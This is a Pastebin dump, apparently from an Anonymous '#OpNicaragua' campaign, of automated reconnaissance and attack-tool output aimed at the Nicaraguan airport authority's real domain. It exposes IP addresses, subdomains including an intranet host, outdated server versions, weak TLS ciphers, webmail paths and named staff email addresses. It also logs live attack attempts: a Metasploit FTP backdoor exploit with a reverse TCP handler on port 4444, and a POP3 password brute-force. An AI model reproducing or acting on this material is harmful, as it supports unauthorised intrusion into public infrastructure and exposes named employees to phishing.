Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- Hostname www.eaai.com.ni ISP Telmex Colombia S.A.
- Continent South America Flag
- CO
- Country Colombia Country Code CO
- Region Bogota D.C. Local time 20 Jul 2018 05:42 -05
- City Bogotá Postal Code 111311
- IP Address 190.85.233.91 Latitude 4.649
- Longitude -74.063
- #######################################################################################################################################
- HostIP:190.212.137.165
- HostName:eaai.com.ni
- Gathered Inet-whois information for 190.212.137.165
- ---------------------------------------------------------------------------------------------------------------------------------------
- Gathered Inic-whois information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Error: Unable to connect - Invalid Host
- ERROR: Connection to InicWhois Server ni.whois-servers.net failed
- close error
- Gathered Netcraft information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for eaai.com.ni
- Netcraft.com Information gathered
- Gathered Subdomain information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.eaai.com.ni
- HostIP:190.85.233.91
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host eaai.com.ni, Searched 0 pages containing 0 results
- Gathered E-Mail information for eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host eaai.com.ni, Searched 0 pages containing 0 results
- Gathered TCP Port information for 190.212.137.165
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 53/tcp open
- 80/tcp open
- 110/tcp open
- Portscan Finished: Scanned 150 ports, 7 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: https://eaai.com.ni
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Empresa Administradora de Aeropuertos Internacionales
- [+] IP address: 190.212.137.165
- [+] Web Server: Apache/2.0.52 (Red Hat)
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 190.212.137.165
- [i] Country: NI
- [i] State: Managua
- [i] City: Managua
- [i] Latitude: 12.150800
- [i] Longitude: -86.268303
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Fri, 20 Jul 2018 10:35:03 GMT
- [i] Server: Apache/2.0.52 (Red Hat)
- [i] X-Powered-By: PHP/4.3.9
- [i] Content-Length: 384
- [i] Connection: close
- [i] Content-Type: text/html; charset=UTF-8
- D N S L O O K U P
- =======================================================================================================================================
- ;; Truncated, retrying in TCP mode.
- eaai.com.ni. 43200 IN NS ns1.eaai.com.ni.
- eaai.com.ni. 43200 IN NS mail1.eaai.com.ni.
- eaai.com.ni. 43200 IN TXT "v=spf1 a:ns1.eaai.com.ni -all"
- eaai.com.ni. 43200 IN NS ns2.enitel.net.ni.
- eaai.com.ni. 43200 IN SOA ns1.eaai.com.ni. root.eaai.com.ni. 2018052301 10800 3600 2419200 3600
- eaai.com.ni. 43200 IN NS ns.enitel.net.ni.
- eaai.com.ni. 43200 IN A 190.212.137.165
- eaai.com.ni. 43200 IN MX 0 ns1.eaai.com.ni.
- eaai.com.ni. 43200 IN A 190.212.137.166
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 190.212.137.165
- Network = 190.212.137.165 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 190.212.137.165 - 190.212.137.165 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.082s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.0.52
- 110/tcp open pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
- 3389/tcp filtered ms-wbt-server
- Service Info: Host: ns.eaai.com.ni
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.80 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 3
- [+] Subdomain: ns1.eaai.com.ni
- [-] IP: 190.212.137.165
- [+] Subdomain: web.eaai.com.ni
- [-] IP: 190.85.233.91
- [+] Subdomain: pat.eaai.com.ni
- [-] IP: 190.212.137.164
- #######################################################################################################################################
- [?] Enter the target: https://www.eaai.com.ni/
- [!] IP Address : 190.85.233.91
- [!] Server: Apache/2.2.3 (CentOS)
- [+] Clickjacking protection is not in place.
- [+] Operating System : CentOS
- [!] www.eaai.com.ni doesn't seem to use a CMS
- [+] Honeypot Probabilty: 0%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.eaai.com.ni
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.eaai.com.ni
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.2.3
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
- 3389/tcp filtered ms-wbt-server
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- [+] Host Records (A)
- www.eaai.com.niHTTP: (190.85.233.91) AS14080 Telmex S.A. Colombia
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/eaai.com.ni.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- pixel-1532083623873460-web-@www.eaai.com.ni
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- #######################################################################################################################################
- Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-20 10:47 UTC
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.082s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- 22/tcp filtered ssh
- 23/tcp filtered telnet
- 80/tcp open http Apache httpd 2.0.52
- 110/tcp open pop3
- 143/tcp filtered imap
- 443/tcp open ssl/http Apache httpd 2.0.52 ((Red Hat))
- 3389/tcp filtered ms-wbt-server
- Service Info: Host: ns.eaai.com.ni
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 15.39 seconds
- #######################################################################################################################################
- Start: Fri Jul 20 10:48:00 2018
- HOST: whatweb Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.55.64.253 0.0% 3 11.4 4.4 0.9 11.4 6.0
- 2.|-- 138.197.251.16 0.0% 3 0.4 5.4 0.4 14.9 8.2
- 3.|-- 138.197.244.32 0.0% 3 1.0 1.0 1.0 1.1 0.0
- 4.|-- ix-ae-3-0.tcore1.n75-new-york.as6453.net 0.0% 3 0.9 0.9 0.8 0.9 0.0
- 5.|-- if-ae-12-2.tcore2.nto-new-york.as6453.net 0.0% 3 1.1 1.2 1.1 1.3 0.0
- 6.|-- be3011.ccr31.jfk05.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.7 0.0
- 7.|-- be3294.ccr41.jfk02.atlas.cogentco.com 0.0% 3 1.4 1.5 1.4 1.6 0.0
- 8.|-- be2806.ccr41.dca01.atlas.cogentco.com 0.0% 3 8.2 8.3 8.2 8.5 0.0
- 9.|-- be2112.ccr41.atl01.atlas.cogentco.com 0.0% 3 18.6 18.7 18.6 18.8 0.0
- 10.|-- be3482.ccr21.mia01.atlas.cogentco.com 0.0% 3 32.4 32.4 32.3 32.4 0.0
- 11.|-- be3400.ccr21.mia03.atlas.cogentco.com 0.0% 3 33.3 33.4 33.3 33.7 0.0
- 12.|-- 38.142.153.74 0.0% 3 58.3 57.6 56.9 58.3 0.0
- 13.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 14.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 15.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 16.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 17.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- 18.|-- 162-137-212-190.enitel.net.ni 0.0% 3 80.4 80.5 80.4 80.7 0.0
- 19.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 190.85.233.91 302 alias beta.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 alias intranet.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.212.137.166 301 host mail.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.166 301 host mail1.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.165 301 host ns.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.212.137.165 301 host ns1.eaai.com.ni Apache/2.0.52 (Red Hat)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 alias www.eaai.com.ni Apache/2.2.3 (CentOS)
- 190.85.233.91 302 host web.eaai.com.ni Apache/2.2.3 (CentOS)
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: eaai.com.ni
- [-] DNSSEC is not configured for eaai.com.ni
- [*] SOA ns1.eaai.com.ni 190.212.137.165
- [*] NS ns2.enitel.net.ni 200.62.64.65
- [*] NS ns1.eaai.com.ni 190.212.137.165
- [*] NS ns.enitel.net.ni 200.62.64.1
- [*] NS mail1.eaai.com.ni 190.212.137.166
- [*] MX ns1.eaai.com.ni 190.212.137.165
- [*] A eaai.com.ni 190.212.137.165
- [*] A eaai.com.ni 190.212.137.166
- [*] TXT eaai.com.ni v=spf1 a:ns1.eaai.com.ni -all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for eaai.com.ni
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain eaai.com.ni
- [+] Getting nameservers
- 200.62.64.65 - ns2.enitel.net.ni
- 190.212.137.165 - ns1.eaai.com.ni
- 200.62.64.1 - ns.enitel.net.ni
- 190.212.137.166 - mail1.eaai.com.ni
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 a:ns1.eaai.com.ni -all"
- [+] MX records found, added to target list
- 0 ns1.eaai.com.ni.
- [*] Scanning eaai.com.ni for A records
- 190.212.137.166 - eaai.com.ni
- 190.212.137.165 - eaai.com.ni
- 190.85.233.91 - beta.eaai.com.ni
- 190.85.233.91 - intranet.eaai.com.ni
- 190.212.137.166 - mail.eaai.com.ni
- 190.212.137.166 - mail1.eaai.com.ni
- 190.212.137.165 - ns.eaai.com.ni
- 190.212.137.165 - ns1.eaai.com.ni
- 190.85.233.91 - web.eaai.com.ni
- 190.85.233.91 - www.eaai.com.ni
- #######################################################################################################################################
- [+] Emails found:
- ------------------
- despachodevuelos@eaai.com.ni
- webm@eaai.com.ni
- comercial@eaai.com.ni
- larostegui@eaai.com.ni
- rrodriguez@eaai.com.ni
- jsaballos@eaai.com.ni
- salonvip@eaai.com.ni
- blu@eaai.com.ni
- emironda@eaai.com.ni
- slopezsam@eaai.com.ni
- aarellano@eaai.com.ni
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Total hosts: 5
- [-] Resolving hostnames IPs...
- ...eaai.com.ni : empty
- .eaai.com.ni : empty
- mail.eaai.com.ni : 190.212.137.166
- mail1.eaai.com.ni : 190.212.137.166
- www.eaai.com.ni : 190.85.233.91
- #######################################################################################################################################
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 190.212.137.165
- Testing SSL server eaai.com.ni on port 443 using SNI name eaai.com.ni
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Insecure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Preferred SSLv3 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted SSLv3 256 bits AES256-SHA
- Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted SSLv3 128 bits AES128-SHA
- Accepted SSLv3 128 bits RC4-SHA
- Accepted SSLv3 128 bits RC4-MD5
- Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 1024 bits
- Accepted SSLv3 112 bits DES-CBC3-SHA
- Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA DHE 1024 bits
- Accepted SSLv3 56 bits DES-CBC-SHA
- Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA DHE 512 bits
- Accepted SSLv3 40 bits EXP-DES-CBC-SHA RSA 512 bits
- Accepted SSLv3 40 bits EXP-RC2-CBC-MD5 RSA 512 bits
- Accepted SSLv3 40 bits EXP-RC4-MD5 RSA 512 bits
- Preferred SSLv2 128 bits RC2-CBC-MD5
- Accepted SSLv2 128 bits RC4-MD5
- Accepted SSLv2 112 bits DES-CBC3-MD5
- Accepted SSLv2 64 bits RC4-64-MD5
- Accepted SSLv2 56 bits DES-CBC-MD5
- Accepted SSLv2 40 bits EXP-RC2-CBC-MD5
- Accepted SSLv2 40 bits EXP-RC4-MD5
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.eaai.com.ni
- Altnames: DNS:*.eaai.com.ni, DNS:eaai.com.ni
- Issuer: Starfield Secure Certificate Authority - G2
- Not valid before: Aug 5 22:21:00 2017 GMT
- Not valid after: Aug 3 22:31:00 2018 GMT
- #######################################################################################################################################
- [+] searching (sub)domains for eaai.com.ni using built-in wordlist
- [+] using maximum random delay of 10 millisecond(s) between requests
- beta.eaai.com.ni
- IP address #1: 190.85.233.91
- intranet.eaai.com.ni
- IP address #1: 190.85.233.91
- mail.eaai.com.ni
- IP address #1: 190.212.137.166
- ns.eaai.com.ni
- IP address #1: 190.212.137.165
- ns1.eaai.com.ni
- IP address #1: 190.212.137.165
- pv.eaai.com.ni
- IP address #1: 165.98.58.22
- web.eaai.com.ni
- IP address #1: 190.85.233.91
- www.eaai.com.ni
- IP address #1: 190.85.233.91
- #######################################################################################################################################
- =======================================================================================================================================
- | [*] http://eaai.com.ni/ redirected to http://eaai.com.ni/
- | [*] New target is: http://eaai.com.ni/
- =======================================================================================================================================
- | Domain: http://eaai.com.ni/
- | Server: Apache/2.0.52 (Red Hat)
- | IP: 190.212.137.165
- =======================================================================================================================================
- |
- | Directory check:
- | [+] CODE: 200 URL: http://eaai.com.ni/icons/
- =======================================================================================================================================
- |
- | File check:
- | [+] CODE: 200 URL: http://eaai.com.ni/error/HTTP_NOT_FOUND.html.var
- | [+] CODE: 200 URL: http://eaai.com.ni/index.php
- | [+] CODE: 200 URL: http://eaai.com.ni/mailman/listinfo
- | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/configtest.php
- | [+] CODE: 200 URL: http://eaai.com.ni/webmail/src/read_body.php
- =======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: mailman@eaai.com.ni
- | [+] E-mail Found: dmvega@eaai.com.ni
- |######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 190.85.233.91
- + Target Hostname: www.eaai.com.ni
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/CN=*.eaai.com.ni
- Ciphers: DHE-RSA-AES256-SHA
- Issuer: /C=US/ST=Arizona/L=Scottsdale/O=Starfield Technologies, Inc./OU=http://certs.starfieldtech.com/repository//CN=Starfield Secure Certificate Authority - G2
- + Start Time: 2018-07-20 11:54:59 (GMT-4)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache/2.2.3 (CentOS)
- + Cookie fc7239472d86929b3f9e2af089868681 created without the secure flag
- + Cookie joomsef_lang created without the secure flag
- + Cookie joomsef_lang created without the httponly flag
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'x-logged-in' found, with contents: False
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Server leaks inodes via ETags, header found with file /robots.txt, inode: 6737953, size: 865, mtime: Mon Oct 27 11:48:10 2014
- + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (401)
- + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Cookie sj_lifemag_tpl created without the secure flag
- + Cookie sj_lifemag_tpl created without the httponly flag
- + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/logs/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
- + "robots.txt" contains 15 entries which should be manually viewed.
- + Server is using a wildcard certificate: *.eaai.com.ni
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
- : Connection timed out
- + Scan terminated: 19 error(s) and 27 item(s) reported on remote host
- + End Time: 2018-07-20 12:33:23 (GMT-4) (2304 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- eaai.com.ni -----
- Host's addresses:
- __________________
- eaai.com.ni. 55136 IN A 190.212.137.166
- eaai.com.ni. 55136 IN A 190.212.137.165
- Name Servers:
- ______________
- mail1.eaai.com.ni. 55151 IN A 190.212.137.166
- ns1.eaai.com.ni. 55151 IN A 190.212.137.165
- ns.enitel.net.ni. 19689 IN A 200.64.62.1
- ns.enitel.net.ni. 19689 IN A 200.62.64.1
- ns2.enitel.net.ni. 19689 IN A 200.62.64.65
- Mail (MX) Servers:
- ___________________
- ns1.eaai.com.ni. 55149 IN A 190.212.137.165
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for eaai.com.ni on mail1.eaai.com.ni ...
- Trying Zone Transfer for eaai.com.ni on ns1.eaai.com.ni ...
- Trying Zone Transfer for eaai.com.ni on ns.enitel.net.ni ...
- Trying Zone Transfer for eaai.com.ni on ns2.enitel.net.ni ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:52 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.88s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- Not shown: 451 closed ports, 20 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 554/tcp open rtsp
- Nmap done: 1 IP address (1 host up) scanned in 8.51 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.55s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- PORT STATE SERVICE
- 53/udp open domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 16:53 EDT
- Nmap scan report for eaai.com.ni (190.212.137.166)
- Host is up (0.24s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.165
- rDNS record for 190.212.137.166: mail1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 21/tcp open ftp?
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: D-Link embedded, TRENDnet embedded
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
- OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
- Network Distance: 1 hop
- RHOST => eaai.com.ni
- RHOSTS => eaai.com.ni
- [-] eaai.com.ni:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (eaai.com.ni:21).
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.29:4444
- [*] eaai.com.ni:21 - Sending Backdoor Command
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:07 EDT
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up.
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 53/tcp filtered domain
- Too many fingerprints match this host to give specific OS details
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | info.com.ni - 50.17.205.182
- | oracle.com.ni - 156.151.59.19
- | cdn.com.ni - 186.1.31.3
- |_ forum.com.ni - 54.86.188.65
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://eaai.com.ni
- The site http://eaai.com.ni is behind a Imperva SecureSphere
- Number of requests: 9
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://eaai.com.ni...
- ______________________ SITE INFO _______________________
- IP Title
- 190.212.137.165 Empresa Administradora de Ae
- 190.212.137.166
- _______________________ VERSION ________________________
- Name Versions Type
- Apache 2.0.52 Platform
- PHP 4.3.9 Platform
- Red Hat Enterprise Linux RHEL-4.8 OS
- ________________________________________________________
- Time: 1.8 sec Urls: 599 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 301 Moved Permanently
- Date: Fri, 20 Jul 2018 20:58:48 GMT
- Server: Apache/2.0.52 (Red Hat)
- Location: https://eaai.com.ni/
- Connection: close
- Content-Type: text/html; charset=iso-8859-1
- #######################################################################################################################################
- [+] Screenshot saved to /usr/share/sniper/loot/eaai.com.ni/screenshots/eaai.com.ni-port80.jpg
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-20 17:11 EDT
- Nmap scan report for eaai.com.ni (190.212.137.165)
- Host is up (0.53s latency).
- Other addresses for eaai.com.ni (not scanned): 190.212.137.166
- rDNS record for 190.212.137.165: ns1.eaai.com.ni
- PORT STATE SERVICE VERSION
- 110/tcp open pop3
- | fingerprint-strings:
- | GenericLines:
- | +OK Server Ready
- | -ERR Invalid command
- | -ERR Invalid command
- | HTTPOptions:
- | -ERR Invalid command
- | -ERR Invalid command
- | Server Ready
- | NULL:
- |_ +OK Server Ready
- | pop3-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 351 guesses in 132 seconds, average tps: 2.7
- |_ ERROR: Failed to connect.
- 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
- SF-Port110-TCP:V=7.70%I=7%D=7/20%Time=5B524FF5%P=x86_64-pc-linux-gnu%r(NUL
- SF:L,13,"\+OK\x20Server\x20Ready\x20\r\n")%r(GenericLines,3F,"\+OK\x20Serv
- SF:er\x20Ready\x20\r\n-ERR\x20Invalid\x20command\r\n-ERR\x20Invalid\x20com
- SF:mand\r\n")%r(HTTPOptions,3F,"-ERR\x20Invalid\x20command\r\n-ERR\x20Inva
- SF:lid\x20command\r\n\+OK\x20Server\x20Ready\x20\r\n");
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: WAP
- Running: D-Link embedded, TRENDnet embedded
- OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
- OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 544.31 ms ns1.eaai.com.ni (190.212.137.165)
- #######################################################################################################################################
- I, [2018-07-20T17:13:44.645938 #14869] INFO -- : Initiating port scan
- Traceback (most recent call last):
- 3: from yasuo.rb:700:in `<main>'
- 2: from yasuo.rb:132:in `run'
- 1: from yasuo.rb:232:in `process_nmap_scan'
- yasuo.rb:232:in `each_slice': invalid slice size (ArgumentError)
- I, [2018-07-20T17:13:48.570743 #14869] INFO -- : Using nmap scan output file logs/nmap_output_2018-07-20_17-13-44.xml
- #######################################################################################################################################
- Anonymous #OpNicaragua JTSEC Full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement